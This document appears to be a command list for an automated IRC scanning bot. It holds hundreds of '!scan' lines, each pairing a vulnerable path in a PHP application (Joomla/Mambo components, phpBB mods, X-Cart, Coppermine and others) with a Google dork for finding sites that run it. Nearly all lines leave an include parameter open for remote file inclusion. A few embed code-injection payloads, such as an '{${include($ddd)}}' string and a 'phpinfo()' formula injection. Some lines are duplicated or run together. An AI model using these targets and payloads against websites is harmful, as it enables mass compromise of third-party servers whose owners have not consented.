!scan PHPDJ_v05/dj/djpage.php?page= allintext:"PHPDJ was created by www.php-mania.co.uk"
!scan /inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= inurl:"index.php?redir="
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" inurl:index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= allinurl:"cmses"
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= "PHPSecurityAdmin"
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= "Advanced Poll"
!scan active/components/xmlrpc/client.php?c[components]= "Pindorama"
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= "NuSEO PHP"
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= "com_jcs"
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= ""Powered by Coppermine"
!scan /default.php?page=home inurl:"/default.php?page=home"
!scan /default.php?page= inurl:"/default.php?page=home"
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= inurl:PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= "powered by Open Bulletin Board"
!scan config.php?fpath= "Powered By PUMA"
!scan /index.php?classified_path= "Vivvo Article Manager"
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
!scan content/article.php?ide= inurl:WM-News
!scan content/modify_go.php?pwfile= inurl:WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= "Powered by phpBB2" site:fr
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= "phpBB"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mx_glance"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mxBB"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= "amember"
!scan news/newstopic_inc.php?indir= "Public Media Manager"
!scan phfito/phfito-post?SRC_PATH= "phpFidoNode"
!scan /protection.php?action=logout&siteurl= "/members.php?id=all"
!scan /appserv/main.php?appserv_root= "The AppServ Open Project"
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= "chupix cms"
!scan forum/forum.php?view= "lustig.cms"
!scan access/login.php?path_to_root= "FrontAccounting"
!scan includes/lang/language.php?path_to_root= "FrontAccounting"
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= "DFD Cart"
!scan show.php?file= "Helplink"
!scan data/compatible.php?module_name= "Nuke Mobile Entartainment"
!scan config.inc.php?_path= "WordSmith"
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= "iziContents"
!scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= "com_joom12pic"
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= "Ajax File Browser"
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= inurl:"com_joomlaradiov5"
!scan config.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan smarty.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan customer/product.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan provider/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan admin/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= "Site Layout & Graphics"
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= "PHPFanBase"
!scan manager/admin/index.php?MGR= "phpRealty"
!scan manager/admin/p_ins.php?MGR= "phpRealty"
!scan manager/admin/u_ins.php?MGR= "phpRealty"
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= "/index.php?option=com_restaurante"
!scan modules/addons/plugin.php?doc_root= "txx cms"
!scan modules/addons/plugin.php?doc_root= inurl:addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= inurl:Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= inurl:Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= inurl:Discipline
!scan lib/functions.php?DOC_ROOT= "Online Fantasy Football League"
!scan lib/header.php?DOC_ROOT= "Online Fantasy Football League"
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= "stph"
!scan stphpbtnimage.php?STPHPLIB_DIR= "stph"
!scan stphpform.php?STPHPLIB_DIR= "stph"
!scan senetman/html/index.php?page= "senetman"
!scan /intern/admin/other/backup.php?admin=1&rootdir= "phpBG"
!scan /intern/admin/?rootdir= "phpBG"
!scan /intern/clan/member_add.php?rootdir= "phpBG"
!scan /intern/config/key_2.php?rootdir= "phpBG"
!scan /intern/config/forum.php?rootdir= "phpBG"
!scan xGB.php?act=admin&do= allinurl:"xGb.php"
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= "mvcw_conver.php"
!scan convert/mvcw.php?vwar_root= "convert/mvcw.php"
!scan convert/mvcw.php?step=1&vwar_root= "convert/mvcw.php"
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= inurl:activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= "Php Blue Dragon"
!scan ncaster/admin/addons/archive/archive.php?adminfolder= inurl:ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:.ru
!scan database.php?mosConfig_absolute_path= "powered by mambo"
!scan config.php?path_to_root= inurl:"path_to_root"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan admin/inc/change_action.php?format_menue= "PHPNews Version 0.93"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan /include.php?path[docroot]= inurl:"newspublish"
!scan newsletter/newsletter.php?waroot= inurl:newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= inurl:mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= inurl:/beacon/
!scan common/func.php?CommonAbsDir= inurl: func.php?
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:"index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= allinurl:"mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
!scan /main.php?sayfa= inurl:"main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan index.php?pageurl= inurl:"index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= "fusion news management system"
!scan index.php?var= inurl:"index.php?var=*.php"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?go= inurl:"index.php?go="
!scan index.php?site= inurl:"index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?id= inurl:"index.php?id=*.php"
!scan index1.php?= inurl:"index1.php?=*.php?
!scan index.php?site= inurl:"index.php?site=*.php"
!scan main.php?id= inurl:"main.php?id=*.php"
!scan content.php?page= inurl:"content.php?page=*.php"
!scan admin.php?page= inurl:"admin.php?page=*.php"
!scan lib/gore.php?libpath= inurl:"/SQuery/"
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
!scan index2.php?p= inurl:"index2.php?p=*.php"
!scan index1.php?go= inurl:"index1.php?go=*.php"
!scan news_detail.php?file= inurl:"news_detail.php?file=*.php"
!scan old_reports.php?file= inurl:"old_reports.php?file=*.php"
!scan index.php?x= inurl:"index.php?x=*.php"
!scan index.php?nic= inurl:"index.php?nic=*.php"
!scan homepage.php?sel= inurl:"homepage.php?sel=*.php"
!scan index.php?sel= inurl:"index.php?sel=*.php"
!scan main.php?x= inurl:"main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"
!scan index2.php?x= inurl:index2.php?x=*.php"
!scan main.php?pagina= inurl:"main.php?pagina=*.php"
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:"edu/index.php?page=*.php"
!scan *.php?page= inurl:*.php?page=*.php"
!scan index.php?oldal= inurl:"index.php?oldal=*.php"
!scan index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php"
!scan index.php?pag= inurl:"index.php?pag=*.php"
!scan index.php?incl= inurl:"index.php?incl="
!scan avatar.php?page= inurl:"avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= inurl:"edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:"com/index.php?x=*.php"
!scan index.php?mode= inurl:"com/index.php?mode=*.php"
!scan index.php?stranica= inurl:"index.php?stranica="
!scan index.php?sub= inurl:"il/index.php?sub=*.php"
!scan index.php?id= inurl:"/index.php?id=*.php"
!scan index.php?t= inurl:"/index.php?t=*.php"
!scan index.php?r= inurl:"index.php?r=*.php"
!scan index.php?menu= inurl:"net/index.php?menu=*.php"
!scan index.php?pag= inurl:"com/index.php?pag=*.php"
!scan solpot.html?body= allinurl: "solpot.html?body"
!scan port.php?content= inurl:port.php?content=*.php"
!scan index0.php?show= inurl:index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan content.php?page= inurl:"*content.php?page=*.php"
!scan index.php?topic= inurl:"/index.php?topic=*.php"
!scan index.php?u= inurl:"/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"
!scan modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
!scan myevent.php?myevent_path= inurl:"uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
!scan index.php?template= inurl:"index.php?"
!scan search.php?cutepath= inurl:"search.php?"
!scan show_news.php?cutepath= inurl:"show_news.php?"
!scan page.php?doc= allinurl:"page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"
!scan help.php?css_path= inurl:phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"
!scan big.php?pathtotemplate= inurl:".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:"/index2.php?to=*.php"
!scan index.php?load= inurl:"/index.php?load=*.php"
!scan home.php?pagina= inurl:"home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /include/write.php?dir= allinurl:/zboard/zboard.php
!scan db.php?path_local= inurl:"db.php?path_local="
!scan index.php?site= inurl:"index.php?site="
!scan index.php?url= inurl:"index.php?url="
!scan index.php?p= inurl:"index.php?p="
!scan index.php?openfile= inurl:"index.php?openfile="
!scan index.php?file= inurl:"index.php?file="
!scan index.php?go= inurl:"index.php?go="
!scan index.php?content= inurl:"index.php?content="
!scan index.php?side= inurl:"index.php?side="
!scan index.php?kobr= inurl:"index.php?kobr="index.php?pg= inurl:"index.php?pg="
!scan index.php?doc= inurl:"index.php?doc="
!scan index.php?l= inurl:"index.php?l="
!scan index.php?a= inurl:"index.php?a="
!scan index.php?principal= inurl:"index.php?principal="
!scan index.php?show= inurl:"index.php?show="
!scan index.php?opcao= inurl:"index.php?opcao="
!scan index.php?conteudo= inurl:"index.php?conteudo="
!scan index.php?meio= inurl:"index.php?meio="
!scan index.php?inc= inurl:"index.php?inc="
!scan index.php?c= inurl:"index.php?c="
!scan index.php?rage= inurl:"index.php?rage="
!scan index.php?arquivo= inurl:"index.php?arquivo="
!scan index.php?nic= inurl:"index.php?nic="
!scan index.php?x= inurl:"index.php?x="
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:"com_mtree"
!scan index.php?place= inurl:"index.php?place="
!scan index.php?show= inurl:"index.php?show="
!scan index.php?dsp= inurl:"index.php?dsp="
!scan index.php?dept= inurl:"index.php?dept="
!scan index.php?lg= inurl:"index.php?lg="
!scan index.php?inhalt= inurl:"index.php?inhalt="
!scan index.php?ort= inurl:"index.php?ort="
!scan index.php?pilih= inurl:"index.php?pilih="
!scan principal.php?conteudo= inurl:"principal.php?conteudo="
!scan main.php?site= inurl:"main.php?site="
!scan template.php?pagina= inurl:"template.php?pagina="
!scan contenido.php?sec= inurl:"contenido.php?sec="
!scan index_principal.php?pagina= inurl:"index_principal.php?pagina="
!scan template.php?name= inurl:"template.php?name="
!scan forum.php?act= inurl:"forum.php?act="
!scan home.php?action= inurl:"home.php?action="
!scan home.php?pagina= inurl:"home.php?pagina="
!scan noticias.php?arq= inurl:"noticias.php?arq="
!scan main.php?x= inurl:"main.php?x="
!scan main.php?page= inurl:"main.php?page="
!scan default.php?page= inurl:"default.php?page="
!scan index.php?cont= inurl:"index.php?cont="
!scan index.php?configFile= inurl:"index.php?configFile="
!scan index.php?meio.php= inurl:"index.php?meio.php="
!scan index.php?include= inurl:"index.php?include="
!scan index.php?open= inurl:"index.php?open=
!scan index.php?visualizar= inurl:"index.php?visualizar="
!scan index.php?x= inurl:"index.php?x="
!scan index.php?pag= inurl:"index.php?pag="
!scan index.php?cat= inurl:"index.php?cat="
!scan index.php?action= inurl:"index.php?action="
!scan index.php?do= inurl:"index.php?do="
!scan index2.php?x= inurl:"index2.php?x="
!scan index2.php?content= inurl:"index2.php?content="
!scan main.php?pagina= inurl:"main.php?pagina="
!scan index.phpmain.php?x= inurl:"index.phpmain.php?x="
!scan index.php?link= inurl:"index.php?link="
!scan index.php?canal= inurl:"index.php?canal="
!scan index.php?screen= inurl:"index.php?screen="
!scan index.php?langc= inurl:"index.php?langc="
!scan services.php?page= inurl:"services.php?page="
!scan htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn="
!scan ihm.php?p= inurl:"ihm.php?p="
!scan default.php?page= inurl:"default.php?page="
!scan folder.php?id= inurl:"folder.php?id="
!scan index.php?Load= inurl:"index.php?Load="
!scan index.php?Language= inurl:"index.php?Language="
!scan hall.php?file= inurl:"hall.php?file="
!scan hall.php?page= inurl:"hall.php?page="
!scan template.php?goto= inurl:"template.php?goto="
!scan video.php?content= inurl:"video.php?content="
!scan pages.php?page= inurl:"pages.php?page="
!scan print.php?page= inurl:"print.php?page="
!scan show.php?page= inurl:"show.php?page="
!scan view.php?page= inurl:"view.php?page="
!scan media.php?page= inurl:"media.php?page="
!scan index1.php?choix= inurl:"index1.php?choix="
!scan index1.php?menu= inurl:"index1.php?menu"
!scan index.php?ort= inurl:"index.php?ort="
!scan index2.php?showpage= inurl:"index2.php?showpage="
!scan index2.php?ascii_seite= inurl:"index2.php?ascii_seite="
!scan index2.php?DoAction= inurl:"index2.php?DoAction="
!scan index2.php?ID= inurl:"index2.php?ID="
!scan index2.php?url_page= inurl:"index2.php?url_page="
!scan index1.php?dat= inurl:"index1.php?dat="
!scan index1.php?site= inurl:"index1.php?site="
!scan index0.php?show= inurl:"index0.php?show="
!scan home.php?content= inurl:"home.php?content="
!scan port.php?content= inurl:"port.php?content="
!scan main.php?link= inurl:"main.php?link="
!scan home.php?x= inurl:"home.php?x="
!scan index1.php?x= inurl:"index1.php?x="
!scan index2.php?x= inurl:"index2.php?x="
!scan main.php?x= inurl:"main.php?x="
!scan homepage.php?sel= inurl:"homepage.php?sel="